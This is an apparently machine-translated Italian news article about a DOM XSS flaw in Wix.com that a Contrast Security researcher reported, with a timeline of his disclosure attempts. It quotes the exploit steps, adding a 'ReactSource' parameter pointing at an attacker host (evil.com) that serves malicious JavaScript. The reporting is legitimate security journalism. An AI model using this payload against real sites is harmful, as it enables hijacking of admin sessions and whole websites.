Casa > Cyber ​​Notizie > XSS Bug Found on Wix.com Platform, Costruito su Open-Source WordPress libreria
CYBER NEWS

XSS Bug Trovato su Wix.com Platform, Costruito su Open-Source WordPress libreria

vulnerabilità stforum

Avete sentito parlare di Wix(.)con?

Wix.com è una piattaforma basata su cloud di sviluppo web progettato per gli utenti di costruire siti web HTML5 e siti mobili attraverso l'utilizzo di strumenti di drag and drop online della società.

Sfortunatamente, un grave bug XSS è stato scoperto sulla piattaforma attualmente mettendo in pericolo milioni di siti web e utenti.

Correlata: Diffusione TeslaCrypt via compromessa WordPress Pagine

Wix(.)com ha un grave bug XSS, ricercatore dice

Come riportato da ricercatori di sicurezza, il servizio ospita milioni di siti web con 87 milioni di utenti registrati. La parte spaventosa è che tutti gli utenti sono al momento soggetti a questa vulnerabilità XSS. Quest'ultimo può essere implementato da aggressori in maniera vermiforme di prendere in consegna account amministratore. Una volta fatto questo, gli attaccanti ottenere il pieno controllo sui siti web compromessi.

La vulnerabilità XSS è stato comunicato da Matt Austin da Contrasto Security. lui ha scritto:

Wix.com ha una grave vulnerabilità di XSS DOM che consente a un utente malintenzionato il controllo completo su ogni sito web ospitato in Wix. Semplicemente con l'aggiunta di un singolo parametro a qualsiasi sito creato su Wix, l'attaccante può causare loro JavaScript da caricare ed eseguire come parte del sito Web di destinazione.

Una semplice riga di codice è sufficiente per innescare il bug

L'attacco può essere attivato solo con l'aggiunta di un semplice comando di reindirizzamento a qualsiasi URL da Wix(.)con. Il risultato viene reindirizzato a JavaScrip dannoso. Vedere un esempio qui sotto:

  • Aggiungere: ?ReactSource=https://evil.com a qualsiasi URL per qualsiasi sito creato su wix.com.
  • Assicurarsi evil.com ospita un file dannoso in /packages-bin/wixCodeInit/wixCodeInit.min.js

Queste semplici linee di codice sono sufficienti per gli attaccanti per essere sicuri che la loro JS viene caricato e attivato come parte del sito web mirato, il ricercatore spiega. Gli aggressori sono anche in grado di ottenere l'accesso ai cookie di sessione e risorse di amministrazione, un pessimo scenario davvero. Ogni volta che un cookie di sessione è raccolto, Gli aggressori possono posizionare liberamente il DOM XSS in un iframe. Questo viene fatto per ospitare contenuti dannosi su qualsiasi sito web amministrato da un operatore.

in caso di successo, questo tipo di attacco può essere sfruttato per la distribuzione di malware, modifica sito web, criptovaluta mineraria, alterando credenziali dell'account, etc.

Che cosa ha detto Wix?

Come per la comunicazione con wix(.)con, le quote ricercatore la seguente esperienza:

Ottobre 10: Crea biglietto supporto richiedendo sicurezza contatto
Ottobre 11: Entrare in contatto con @wix su Twitter per trovare un contatto di sicurezza. Risposto a utilizzare il supporto di serie. Ha dato i dettagli in ticket creato. pagina Biglietteria non funziona più. https://www.wix.com/support/html5/contact.
Ottobre 14: serie Ricevuto "Stiamo indagando la materia e seguiremo fino al più presto possibile" risposta da Wix.
Ottobre 20: Rispondi a biglietto richiedendo un aggiornamento. (nessuna risposta)
Ottobre 27: Seconda richiesta di aggiornamento. (nessuna risposta)

Ottobre 28, il ricercatore finalmente ricevuto un rispondere, che ha dichiarato che il

gruppo si è tentato di contattare (sicurezza) Non può esistere, o non si può avere il permesso di inviare messaggi al gruppo.

Ciò nonostante, l'amministratore delegato di Wix Avishai Abrahami alla fine ha ammesso che alcuni aspetti della piattaforma si basano sulla libreria open-source di WordPress. Egli sostiene che tutto ciò che è stato migliorato è stato rilasciato alla comunità, ZDNet riporta.

Milena Dimitrova

Milena Dimitrova

Uno scrittore ispirato e un gestore di contenuti che è stato con SensorsTechForum dall'inizio del progetto. Un professionista con 10+ anni di esperienza nella creazione di contenuti accattivanti. Incentrato sulla privacy degli utenti e lo sviluppo di malware, crede fortemente in un mondo in cui la sicurezza informatica gioca un ruolo centrale. Se il buon senso non ha senso, lei sarà lì per prendere appunti. Quelle note possono poi trasformarsi in articoli! Seguire Milena @Milenyim

Altri messaggi

Seguimi:
Cinguettio

Lascio un commento

Il tuo indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

Termine è esaurito. Ricarica CAPTCHA.

Condividi su Facebook Quota
Loading ...
Condividi su Twitter Tweet
Loading ...
Condividi su Google Plus Quota
Loading ...
Condividi su Linkedin Quota
Loading ...
Condividi su Digg Quota
Condividi su Reddit Quota
Loading ...
Condividi su Stumbleupon Quota
Loading ...